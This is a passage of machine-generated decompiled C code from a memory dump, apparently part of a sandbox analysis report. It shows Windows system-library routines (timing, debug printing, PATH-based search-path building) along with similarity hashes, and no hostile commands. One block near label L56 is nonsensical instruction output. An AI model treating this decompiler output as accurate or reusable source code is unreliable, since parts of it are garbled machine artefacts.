                                                					return E0162B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                				}
                                                				_t8 = _t112 + 8; // 0x8b000cc2
                                                				_t67 =  *_t8;
                                                				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                				_t108 =  *(_t67 + 0x14);
                                                				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                				_t105 = 0x2710;
                                                				asm("sbb eax, edi");
                                                				_v44 = _t88;
                                                				_v52 = _t108;
                                                				_t60 = E0162CE00(_t97, _t68, 0x2710, 0);
                                                				_v56 = _t60;
                                                				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                					L3:
                                                					 *(_t112 + 0x44) = _t60;
                                                					_t105 = _t60 * 0x2710 >> 0x20;
                                                					 *_t112 = _t88;
                                                					 *(_t112 + 4) = _t108;
                                                					_v20 = _t60 * 0x2710;
                                                					_v16 = _t60 * 0x2710 >> 0x20;
                                                					if(_v77 != 0) {
                                                						L16:
                                                						_v36 = _t88;
                                                						_v32 = _t108;
                                                						if(E01607D50() != 0) {
                                                							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                						} else {
                                                							_t73 = 0x7ffe0386;
                                                						}
                                                						if( *_t73 != 0) {
                                                							_t105 = _v40;
                                                							E016B8F6A(_t112, _v40, _t88, _t108);
                                                						}
                                                						_push( &_v28);
                                                						_push(0);
                                                						_push( &_v36);
                                                						_t48 = _t112 + 0x10; // 0x778df98b
                                                						_push( *_t48);
                                                						_t60 = E0162AF60();
                                                						goto L20;
                                                					} else {
                                                						_t89 = 0x7ffe03b0;
                                                						do {
                                                							_t114 = 0x7ffe0010;
                                                							do {
                                                								_t77 =  *0x16d8628; // 0x0
                                                								_v68 = _t77;
                                                								_t78 =  *0x16d862c; // 0x0
                                                								_v64 = _t78;
                                                								_v72 =  *_t89;
                                                								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                								while(1) {
                                                									_t105 =  *0x7ffe000c;
                                                									_t100 =  *0x7ffe0008;
                                                									if(_t105 ==  *_t114) {
                                                										goto L8;
                                                									}
                                                									asm("pause");
                                                								}
                                                								L8:
                                                								_t89 = 0x7ffe03b0;
                                                								_t115 =  *0x7ffe03b0;
                                                								_t82 =  *0x7FFE03B4;
                                                								_v60 = _t115;
                                                								_t114 = 0x7ffe0010;
                                                								_v56 = _t82;
                                                							} while (_v72 != _t115 || _v76 != _t82);
                                                							_t83 =  *0x16d8628; // 0x0
                                                							_t116 =  *0x16d862c; // 0x0
                                                							_v76 = _t116;
                                                							_t117 = _v68;
                                                						} while (_t117 != _t83 || _v64 != _v76);
                                                						asm("sbb edx, [esp+0x24]");
                                                						_t102 = _t100 - _v60 - _t117;
                                                						_t112 = _v48;
                                                						_t91 = _v44;
                                                						asm("sbb edx, eax");
                                                						_t130 = _t105 - _v52;
                                                						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                							_t88 = _t102 - _t91;
                                                							asm("sbb edx, edi");
                                                							_t108 = _t105;
                                                						} else {
                                                							_t88 = 0;
                                                							_t108 = 0;
                                                						}
                                                						goto L16;
                                                					}
                                                				} else {
                                                					if( *(_t112 + 0x44) == _t60) {
                                                						goto L20;
                                                					}
                                                					goto L3;
                                                				}
                                                			}


                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0160B9A5
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 885266447-0
                                                • Opcode ID: cdbfbd7c7425b67617a455f7c975de540ecfc719f992ea052527877b340b4ed7
                                                • Instruction ID: 13438eaac209f32e20bbf09a38e026a893c065f3f083cdcf6e23d291a26145b9
                                                • Opcode Fuzzy Hash: cdbfbd7c7425b67617a455f7c975de540ecfc719f992ea052527877b340b4ed7
                                                • Instruction Fuzzy Hash: FD516C75A08751CFC726CF6DC88092BBBF9FB88610F14896EE99587385D730E840CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E015EB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                				signed int _t65;
                                                				signed short _t69;
                                                				intOrPtr _t70;
                                                				signed short _t85;
                                                				void* _t86;
                                                				signed short _t89;
                                                				signed short _t91;
                                                				intOrPtr _t92;
                                                				intOrPtr _t97;
                                                				intOrPtr* _t98;
                                                				signed short _t99;
                                                				signed short _t101;
                                                				void* _t102;
                                                				char* _t103;
                                                				signed short _t104;
                                                				intOrPtr* _t110;
                                                				void* _t111;
                                                				void* _t114;
                                                				intOrPtr* _t115;
                                                
                                                				_t109 = __esi;
                                                				_t108 = __edi;
                                                				_t106 = __edx;
                                                				_t95 = __ebx;
                                                				_push(0x90);
                                                				_push(0x16bf7a8);
                                                				E0163D0E8(__ebx, __edi, __esi);
                                                				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                				if(__edx == 0xffffffff) {
                                                					L6:
                                                					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                					__eflags = _t65 & 0x00000002;
                                                					if((_t65 & 0x00000002) != 0) {
                                                						L3:
                                                						L4:
                                                						return E0163D130(_t95, _t108, _t109);
                                                					}
                                                					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                					_t108 = 0;
                                                					_t109 = 0;
                                                					_t95 = 0;
                                                					__eflags = 0;
                                                					while(1) {
                                                						__eflags = _t95 - 0x200;
                                                						if(_t95 >= 0x200) {
                                                							break;
                                                						}
                                                						E0162D000(0x80);
                                                						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                						_t108 = _t115;
                                                						_t95 = _t95 - 0xffffff80;
                                                						_t17 = _t114 - 4;
                                                						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                						__eflags =  *_t17;
                                                						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                						_t102 = _t110 + 1;
                                                						do {
                                                							_t85 =  *_t110;
                                                							_t110 = _t110 + 1;
                                                							__eflags = _t85;
                                                						} while (_t85 != 0);
                                                						_t111 = _t110 - _t102;
                                                						_t21 = _t95 - 1; // -129
                                                						_t86 = _t21;
                                                						__eflags = _t111 - _t86;
                                                						if(_t111 > _t86) {
                                                							_t111 = _t86;
                                                						}
                                                						E0162F3E0(_t108, _t106, _t111);
                                                						_t115 = _t115 + 0xc;
                                                						_t103 = _t111 + _t108;
                                                						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                						_t89 = _t95 - _t111;
                                                						__eflags = _t89;
                                                						_push(0);
                                                						if(_t89 == 0) {
                                                							L15:
                                                							_t109 = 0xc000000d;
                                                							goto L16;
                                                						} else {
                                                							__eflags = _t89 - 0x7fffffff;
                                                							if(_t89 <= 0x7fffffff) {
                                                								L16:
                                                								 *(_t114 - 0x94) = _t109;
                                                								__eflags = _t109;
                                                								if(_t109 < 0) {
                                                									__eflags = _t89;
                                                									if(_t89 != 0) {
                                                										 *_t103 = 0;
                                                									}
                                                									L26:
                                                									 *(_t114 - 0xa0) = _t109;
                                                									 *(_t114 - 4) = 0xfffffffe;
                                                									__eflags = _t109;
                                                									if(_t109 >= 0) {
                                                										L31:
                                                										_t98 = _t108;
                                                										_t39 = _t98 + 1; // 0x1
                                                										_t106 = _t39;
                                                										do {
                                                											_t69 =  *_t98;
                                                											_t98 = _t98 + 1;
                                                											__eflags = _t69;
                                                										} while (_t69 != 0);
                                                										_t99 = _t98 - _t106;
                                                										__eflags = _t99;
                                                										L34:
                                                										_t70 =  *[fs:0x30];
                                                										__eflags =  *((char*)(_t70 + 2));
                                                										if( *((char*)(_t70 + 2)) != 0) {
                                                											L40:
                                                											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                											 *(_t114 - 4) = 1;
                                                											_push(_t114 - 0x74);
                                                											L0163DEF0(_t99, _t106);
                                                											 *(_t114 - 4) = 0xfffffffe;
                                                											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                											goto L3;
                                                										}
                                                										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                											goto L40;
                                                										}
                                                										_push( *((intOrPtr*)(_t114 + 8)));
                                                										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                										_push(_t99 & 0x0000ffff);
                                                										_push(_t108);
                                                										_push(1);
                                                										_t101 = E0162B280();
                                                										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                										if( *((char*)(_t114 + 0x14)) == 1) {
                                                											__eflags = _t101 - 0x80000003;
                                                											if(_t101 == 0x80000003) {
                                                												E0162B7E0(1);
                                                												_t101 = 0;
                                                												__eflags = 0;
                                                											}
                                                										}
                                                										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                										goto L4;
                                                									}
                                                									__eflags = _t109 - 0x80000005;
                                                									if(_t109 == 0x80000005) {
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								 *(_t114 - 0x90) = 0;
                                                								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                								_t91 = E0162E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                								_t115 = _t115 + 0x10;
                                                								_t104 = _t91;
                                                								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                								__eflags = _t104;
                                                								if(_t104 < 0) {
                                                									L21:
                                                									_t109 = 0x80000005;
                                                									 *(_t114 - 0x90) = 0x80000005;
                                                									L22:
                                                									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                									L23:
                                                									 *(_t114 - 0x94) = _t109;
                                                									goto L26;
                                                								}
                                                								__eflags = _t104 - _t92;
                                                								if(__eflags > 0) {
                                                									goto L21;
                                                								}
                                                								if(__eflags == 0) {
                                                									goto L22;
                                                								}
                                                								goto L23;
                                                							}
                                                							goto L15;
                                                						}
                                                					}
                                                					__eflags = _t109;
                                                					if(_t109 >= 0) {
                                                						goto L31;
                                                					}
                                                					__eflags = _t109 - 0x80000005;
                                                					if(_t109 != 0x80000005) {
                                                						goto L31;
                                                					}
                                                					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                					_t38 = _t95 - 1; // -129
                                                					_t99 = _t38;
                                                					goto L34;
                                                				}
                                                				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                					__eflags = __edx - 0x65;
                                                					if(__edx != 0x65) {
                                                						goto L2;
                                                					}
                                                					goto L6;
                                                				}
                                                				L2:
                                                				_push( *((intOrPtr*)(_t114 + 8)));
                                                				_push(_t106);
                                                				if(E0162A890() != 0) {
                                                					goto L6;
                                                				}
                                                				goto L3;
                                                			}


                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: _vswprintf_s
                                                • String ID:
                                                • API String ID: 677850445-0
                                                • Opcode ID: 633fc353151591f46cf241ff4fca4194aa431a5ed4944c83b97d6ccdcb052d35
                                                • Instruction ID: 6ebd4368a7cd29280abeb695725bea2b5b4e8851b42523277293a8c328d68c44
                                                • Opcode Fuzzy Hash: 633fc353151591f46cf241ff4fca4194aa431a5ed4944c83b97d6ccdcb052d35
                                                • Instruction Fuzzy Hash: 2351C175D002698FEB35CF688C46BAEBBB1BF01714F1141ADD859AB382DB708941DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E01612581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                				signed int _v8;
                                                				signed int _v16;
                                                				unsigned int _v24;
                                                				void* _v28;
                                                				signed int _v32;
                                                				unsigned int _v36;
                                                				signed int _v37;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				intOrPtr _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				signed int _v72;
                                                				signed int _v76;
                                                				signed int _v80;
                                                				signed int _t235;
                                                				signed int _t239;
                                                				char* _t240;
                                                				signed int _t244;
                                                				signed int _t246;
                                                				intOrPtr _t248;
                                                				signed int _t251;
                                                				signed int _t258;
                                                				signed int _t261;
                                                				signed int _t269;
                                                				intOrPtr _t275;
                                                				signed int _t277;
                                                				signed int _t279;
                                                				void* _t280;
                                                				void* _t281;
                                                				signed int _t282;
                                                				unsigned int _t285;
                                                				signed int _t289;
                                                				void* _t290;
                                                				signed int _t291;
                                                				signed int _t295;
                                                				intOrPtr _t307;
                                                				signed int _t316;
                                                				signed int _t318;
                                                				signed int _t319;
                                                				signed int _t323;
                                                				signed int _t324;
                                                				intOrPtr* _t326;
                                                				signed int _t328;
                                                				signed int _t330;
                                                				signed int _t333;
                                                				void* _t334;
                                                				void* _t336;
                                                
                                                				_t330 = _t333;
                                                				_t334 = _t333 - 0x4c;
                                                				_v8 =  *0x16dd360 ^ _t330;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_t323 = 0x16db2e8;
                                                				_v56 = _a4;
                                                				_v48 = __edx;
                                                				_v60 = __ecx;
                                                				_t285 = 0;
                                                				_v80 = 0;
                                                				asm("movsd");
                                                				_v64 = 0;
                                                				_v76 = 0;
                                                				_v72 = 0;
                                                				asm("movsd");
                                                				_v44 = 0;
                                                				_v52 = 0;
                                                				_v68 = 0;
                                                				asm("movsd");
                                                				_v32 = 0;
                                                				_v36 = 0;
                                                				asm("movsd");
                                                				_v16 = 0;
                                                				_t275 = 0x48;
                                                				_t305 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                				_t316 = 0;
                                                				_v37 = _t305;
                                                				if(_v48 <= 0) {
                                                					L16:
                                                					_t45 = _t275 - 0x48; // 0x0
                                                					__eflags = _t45 - 0xfffe;
                                                					if(_t45 > 0xfffe) {
                                                						_t324 = 0xc0000106;
                                                						goto L32;
                                                					} else {
                                                						_t323 = L01604620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                						_v52 = _t323;
                                                						__eflags = _t323;
                                                						if(_t323 == 0) {
                                                							_t324 = 0xc0000017;
                                                							goto L32;
                                                						} else {
                                                							 *(_t323 + 0x44) =  *(_t323 + 0x44) & 0x00000000;
                                                							_t50 = _t323 + 0x48; // 0x48
                                                							_t318 = _t50;
                                                							_t305 = _v32;
                                                							 *((intOrPtr*)(_t323 + 0x3c)) = _t275;
                                                							_t277 = 0;
                                                							 *((short*)(_t323 + 0x30)) = _v48;
                                                							__eflags = _t305;
                                                							if(_t305 != 0) {
                                                								 *(_t323 + 0x18) = _t318;
                                                								__eflags = _t305 - 0x16d8478;
                                                								 *_t323 = ((0 | _t305 == 0x016d8478) - 0x00000001 & 0xfffffffb) + 7;
                                                								E0162F3E0(_t318,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
                                                								_t305 = _v32;
                                                								_t334 = _t334 + 0xc;
                                                								_t277 = 1;
                                                								__eflags = _a8;
                                                								_t318 = _t318 + (( *_t305 & 0x0000ffff) >> 1) * 2;
                                                								if(_a8 != 0) {
                                                									_t269 = E016739F2(_t318);
                                                									_t305 = _v32;
                                                									_t318 = _t269;
                                                								}
                                                							}
                                                							_t289 = 0;
                                                							_v16 = 0;
                                                							__eflags = _v48;
                                                							if(_v48 <= 0) {
                                                								L31:
                                                								_t324 = _v68;
                                                								__eflags = 0;
                                                								 *((short*)(_t318 - 2)) = 0;
                                                								goto L32;
                                                							} else {
                                                								_t279 = _t323 + _t277 * 4;
                                                								_v56 = _t279;
                                                								do {
                                                									__eflags = _t305;
                                                									if(_t305 != 0) {
                                                										_t235 =  *(_v60 + _t289 * 4);
                                                										__eflags = _t235;
                                                										if(_t235 == 0) {
                                                											goto L30;
                                                										} else {
                                                											__eflags = _t235 == 5;
                                                											if(_t235 == 5) {
                                                												goto L30;
                                                											} else {
                                                												goto L22;
                                                											}
                                                										}
                                                									} else {
                                                										L22:
                                                										 *_t279 =  *(_v60 + _t289 * 4);
                                                										 *(_t279 + 0x18) = _t318;
                                                										_t239 =  *(_v60 + _t289 * 4);
                                                										__eflags = _t239 - 8;
                                                										if(_t239 > 8) {
                                                											goto L56;
                                                										} else {
                                                											switch( *((intOrPtr*)(_t239 * 4 +  &M01612959))) {
                                                												case 0:
                                                													__ax =  *0x16d8488;
                                                													__eflags = __ax;
                                                													if(__ax == 0) {
                                                														goto L29;
                                                													} else {
                                                														__ax & 0x0000ffff = E0162F3E0(__edi,  *0x16d848c, __ax & 0x0000ffff);
                                                														__eax =  *0x16d8488 & 0x0000ffff;
                                                														goto L26;
                                                													}
                                                													goto L108;
                                                												case 1:
                                                													L45:
                                                													E0162F3E0(_t318, _v80, _v64);
                                                													_t264 = _v64;
                                                													goto L26;
                                                												case 2:
                                                													 *0x16d8480 & 0x0000ffff = E0162F3E0(__edi,  *0x16d8484,  *0x16d8480 & 0x0000ffff);
                                                													__eax =  *0x16d8480 & 0x0000ffff;
                                                													__eax = ( *0x16d8480 & 0x0000ffff) >> 1;
                                                													__edi = __edi + __eax * 2;
                                                													goto L28;
                                                												case 3:
                                                													__eax = _v44;
                                                													__eflags = __eax;
                                                													if(__eax == 0) {
                                                														goto L29;
                                                													} else {
                                                														__esi = __eax + __eax;
                                                														__eax = E0162F3E0(__edi, _v72, __esi);
                                                														__edi = __edi + __esi;
                                                														__esi = _v52;
                                                														goto L27;
                                                													}
                                                													goto L108;
                                                												case 4:
                                                													_push(0x2e);
                                                													_pop(__eax);
                                                													 *(__esi + 0x44) = __edi;
                                                													 *__edi = __ax;
                                                													__edi = __edi + 4;
                                                													_push(0x3b);
                                                													_pop(__eax);
                                                													 *(__edi - 2) = __ax;
                                                													goto L29;
                                                												case 5:
                                                													__eflags = _v36;
                                                													if(_v36 == 0) {
                                                														goto L45;
                                                													} else {
                                                														E0162F3E0(_t318, _v76, _v36);
                                                														_t264 = _v36;
                                                													}
                                                													L26:
                                                													_t334 = _t334 + 0xc;
                                                													_t318 = _t318 + (_t264 >> 1) * 2 + 2;
                                                													__eflags = _t318;
                                                													L27:
                                                													_push(0x3b);
                                                													_pop(_t266);
                                                													 *((short*)(_t318 - 2)) = _t266;
                                                													goto L28;
                                                												case 6:
                                                													__ebx = "\\Wow\\Wow";
                                                													__eflags = __ebx - "\\Wow\\Wow";
                                                													if(__ebx != "\\Wow\\Wow") {
                                                														_push(0x3b);
                                                														_pop(__esi);
                                                														do {
                                                															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                															E0162F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                															__edi = __edi + __eax * 2;
                                                															__edi = __edi + 2;
                                                															 *(__edi - 2) = __si;
                                                															__ebx =  *__ebx;
                                                															__eflags = __ebx - "\\Wow\\Wow";
                                                														} while (__ebx != "\\Wow\\Wow");
                                                														__esi = _v52;
                                                														__ecx = _v16;
                                                														__edx = _v32;
                                                													}
                                                													__ebx = _v56;
                                                													goto L29;
                                                												case 7:
                                                													 *0x16d8478 & 0x0000ffff = E0162F3E0(__edi,  *0x16d847c,  *0x16d8478 & 0x0000ffff);
                                                													__eax =  *0x16d8478 & 0x0000ffff;
                                                													__eax = ( *0x16d8478 & 0x0000ffff) >> 1;
                                                													__eflags = _a8;
                                                													__edi = __edi + __eax * 2;
                                                													if(_a8 != 0) {
                                                														__ecx = __edi;
                                                														__eax = E016739F2(__ecx);
                                                														__edi = __eax;
                                                													}
                                                													goto L28;
                                                												case 8:
                                                													__eax = 0;
                                                													 *(__edi - 2) = __ax;
                                                													 *0x16d6e58 & 0x0000ffff = E0162F3E0(__edi,  *0x16d6e5c,  *0x16d6e58 & 0x0000ffff);
                                                													 *(__esi + 0x38) = __edi;
                                                													__eax =  *0x16d6e58 & 0x0000ffff;
                                                													__eax = ( *0x16d6e58 & 0x0000ffff) >> 1;
                                                													__edi = __edi + __eax * 2;
                                                													__edi = __edi + 2;
                                                													L28:
                                                													_t289 = _v16;
                                                													_t305 = _v32;
                                                													L29:
                                                													_t279 = _t279 + 4;
                                                													__eflags = _t279;
                                                													_v56 = _t279;
                                                													goto L30;
                                                											}
                                                										}
                                                									}
                                                									goto L108;
                                                									L30:
                                                									_t289 = _t289 + 1;
                                                									_v16 = _t289;
                                                									__eflags = _t289 - _v48;
                                                								} while (_t289 < _v48);
                                                								goto L31;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					while(1) {
                                                						L1:
                                                						_t239 =  *(_v60 + _t316 * 4);
                                                						if(_t239 > 8) {
                                                							break;
                                                						}
                                                						switch( *((intOrPtr*)(_t239 * 4 +  &M01612935))) {
                                                							case 0:
                                                								__ax =  *0x16d8488;
                                                								__eflags = __ax;
                                                								if(__ax != 0) {
                                                									__eax = __ax & 0x0000ffff;
                                                									__ebx = __ebx + 2;
                                                									__eflags = __ebx;
                                                									goto L53;
                                                								}
                                                								goto L14;
                                                							case 1:
                                                								L44:
                                                								_t305 =  &_v64;
                                                								_v80 = E01612E3E(0,  &_v64);
                                                								_t275 = _t275 + _v64 + 2;
                                                								goto L13;
                                                							case 2:
                                                								__eax =  *0x16d8480 & 0x0000ffff;
                                                								__ebx = __ebx + __eax;
                                                								__eflags = __dl;
                                                								if(__dl != 0) {
                                                									__eax = 0x16d8480;
                                                									goto L80;
                                                								}
                                                								goto L14;
                                                							case 3:
                                                								__eax = E015FEEF0(0x16d79a0);
                                                								__eax =  &_v44;
                                                								_push(__eax);
                                                								_push(0);
                                                								_push(0);
                                                								_push(4);
                                                								_push(L"PATH");
                                                								_push(0);
                                                								L57();
                                                								__esi = __eax;
                                                								_v68 = __esi;
                                                								__eflags = __esi - 0xc0000023;
                                                								if(__esi != 0xc0000023) {
                                                									L10:
                                                									__eax = E015FEB70(__ecx, 0x16d79a0);
                                                									__eflags = __esi - 0xc0000100;
                                                									if(__esi == 0xc0000100) {
                                                										_v44 = _v44 & 0x00000000;
                                                										__eax = 0;
                                                										_v68 = 0;
                                                										goto L13;
                                                									} else {
                                                										__eflags = __esi;
                                                										if(__esi < 0) {
                                                											L32:
                                                											_t213 = _v72;
                                                											__eflags = _t213;
                                                											if(_t213 != 0) {
                                                												L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
                                                											}
                                                											_t214 = _v52;
                                                											__eflags = _t214;
                                                											if(_t214 != 0) {
                                                												__eflags = _t324;
                                                												if(_t324 < 0) {
                                                													L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
                                                													_t214 = 0;
                                                												}
                                                											}
                                                											goto L36;
                                                										} else {
                                                											__eax = _v44;
                                                											__ebx = __ebx + __eax * 2;
                                                											__ebx = __ebx + 2;
                                                											__eflags = __ebx;
                                                											L13:
                                                											_t285 = _v36;
                                                											goto L14;
                                                										}
                                                									}
                                                								} else {
                                                									__eax = _v44;
                                                									__ecx =  *0x16d7b9c; // 0x0
                                                									_v44 + _v44 =  *[fs:0x30];
                                                									__ecx = __ecx + 0x180000;
                                                									__eax = L01604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                									_v72 = __eax;
                                                									__eflags = __eax;
                                                									if(__eax == 0) {
                                                										__eax = E015FEB70(__ecx, 0x16d79a0);
                                                										__eax = _v52;
                                                										L36:
                                                										_pop(_t317);
                                                										_pop(_t325);
                                                										__eflags = _v8 ^ _t330;
                                                										_pop(_t276);
                                                										return E0162B640(_t214, _t276, _v8 ^ _t330, _t305, _t317, _t325);
                                                									} else {
                                                										__ecx =  &_v44;
                                                										_push(__ecx);
                                                										_push(_v44);
                                                										_push(__eax);
                                                										_push(4);
                                                										_push(L"PATH");
                                                										_push(0);
                                                										L57();
                                                										__esi = __eax;
                                                										_v68 = __eax;
                                                										goto L10;
                                                									}
                                                								}
                                                								goto L108;
                                                							case 4:
                                                								__ebx = __ebx + 4;
                                                								goto L14;
                                                							case 5:
                                                								_t271 = _v56;
                                                								if(_v56 != 0) {
                                                									_t305 =  &_v36;
                                                									_t273 = E01612E3E(_t271,  &_v36);
                                                									_t285 = _v36;
                                                									_v76 = _t273;
                                                								}
                                                								if(_t285 == 0) {
                                                									goto L44;
                                                								} else {
                                                									_t275 = _t275 + 2 + _t285;
                                                								}
                                                								goto L14;
                                                							case 6:
                                                								__eax =  *0x16d5764 & 0x0000ffff;
                                                								goto L53;
                                                							case 7:
                                                								__eax =  *0x16d8478 & 0x0000ffff;
                                                								__ebx = __ebx + __eax;
                                                								__eflags = _a8;
                                                								if(_a8 != 0) {
                                                									__ebx = __ebx + 0x16;
                                                									__ebx = __ebx + __eax;
                                                								}
                                                								__eflags = __dl;
                                                								if(__dl != 0) {
                                                									__eax = 0x16d8478;
                                                									L80:
                                                									_v32 = __eax;
                                                								}
                                                								goto L14;
                                                							case 8:
                                                								__eax =  *0x16d6e58 & 0x0000ffff;
                                                								__eax = ( *0x16d6e58 & 0x0000ffff) + 2;
                                                								L53:
                                                								__ebx = __ebx + __eax;
                                                								L14:
                                                								_t316 = _t316 + 1;
                                                								if(_t316 >= _v48) {
                                                									goto L16;
                                                								} else {
                                                									_t305 = _v37;
                                                									goto L1;
                                                								}
                                                								goto L108;
                                                						}
                                                					}
                                                					L56:
                                                					_t290 = 0x25;
                                                					asm("int 0x29");
                                                					asm("out 0x28, al");
                                                					asm("popad");
                                                					 *((intOrPtr*)(_t323 + 0x28)) =  *((intOrPtr*)(_t323 + 0x28)) + _t334;
                                                					asm("popad");
                                                					_t240 = _t239 + _t334;
                                                					asm("daa");
                                                					asm("popad");
                                                					 *_t323 =  *_t323 + _t330;
                                                					asm("popad");
                                                					 *((intOrPtr*)(_t323 + 0x28)) =  *((intOrPtr*)(_t323 + 0x28)) + _t240;
                                                					asm("popad");
                                                					 *0x1f016126 =  *0x1f016126 + _t240;
                                                					_pop(_t280);
                                                					 *[gs:eax+ebp+0x5b350161] =  *[gs:eax+ebp+0x5b350161] + _t305;
                                                					 *[gs:edx] =  *[gs:edx] + _t240;
                                                					 *((intOrPtr*)(_t290 + 1)) =  *((intOrPtr*)(_t290 + 1)) - _t334;
                                                					 *_t240 =  *_t240 - 0x61;
                                                					_t326 = _t323 + _t323;
                                                					asm("daa");
                                                					asm("popad");
                                                					 *_t326 =  *_t326 + _t280;
                                                					 *((intOrPtr*)(_t290 + 1)) =  *((intOrPtr*)(_t290 + 1)) - _t240;
                                                					_t327 = _t326 - 1;
                                                					 *((intOrPtr*)(_t290 + 1)) =  *((intOrPtr*)(_t290 + 1)) - _t240;
                                                					asm("daa");
                                                					asm("popad");
                                                					_pop(_t281);
                                                					 *[gs:eax+ebp+0x5c340161] =  *[gs:eax+ebp+0x5c340161] + _t326 - 1;
                                                					_t336 = _t334 + _t290;
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					_push(0x20);
                                                					_push(0x16bff00);
                                                					E0163D08C(_t281, _t318, _t327);
                                                					_v44 =  *[fs:0x18];
                                                					_t319 = 0;
                                                					 *_a24 = 0;
                                                					_t282 = _a12;
                                                					__eflags = _t282;
                                                					if(_t282 == 0) {
                                                						_t244 = 0xc0000100;
                                                					} else {
                                                						_v8 = 0;
                                                						_t328 = 0xc0000100;
                                                						_v52 = 0xc0000100;
                                                						_t246 = 4;
                                                						while(1) {
                                                							_v40 = _t246;
                                                							__eflags = _t246;
                                                							if(_t246 == 0) {
                                                								break;
                                                							}
                                                							_t295 = _t246 * 0xc;
                                                							_v48 = _t295;
                                                							__eflags = _t282 -  *((intOrPtr*)(_t295 + 0x15c1664));
                                                							if(__eflags <= 0) {
                                                								if(__eflags == 0) {
                                                									_t261 = E0162E5C0(_a8,  *((intOrPtr*)(_t295 + 0x15c1668)), _t282);
                                                									_t336 = _t336 + 0xc;
                                                									__eflags = _t261;
